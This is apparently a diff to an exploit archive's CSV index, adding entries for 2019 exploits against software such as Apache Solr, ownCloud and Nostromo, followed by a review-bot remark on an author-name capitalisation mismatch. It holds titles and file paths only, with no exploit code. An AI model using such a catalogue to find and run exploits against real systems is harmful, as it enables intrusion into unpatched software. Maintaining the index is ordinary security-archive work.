 47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
+47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41886,3 +41888,6 @@ id,file,description,date,author,type,platform,port
 47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml,
 47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware,
 47567,exploits/php/webapps/47567.txt,"Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php,
+47569,exploits/php/webapps/47569.txt,"TheJshen contentManagementSystem 1.04 - 'id' SQL Injection",2019-11-01,cakes,webapps,php,
+47571,exploits/linux/webapps/47571.txt,"ownCloud 10.3.0 stable - Cross-Site Request Forgery",2019-11-01,"Ozer Goker",webapps,linux,
+47572,exploits/java/webapps/47572.py,"Apache Solr 8.2.0 - Remote Code Execution",2019-11-01,@l3x_wong,webapps,java,
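Review bot: The new 47569 row records the author as `cakes` while the header of 47569.txt in this same commit says `Cakes`; the index is what the site searches by author, so the two should agree — `47569,exploits/php/webapps/47569.txt,"TheJshen contentManagementSystem 1.04 - 'id' SQL Injection",2019-11-01,Cakes,webapps,php,`. The other new rows match their file headers.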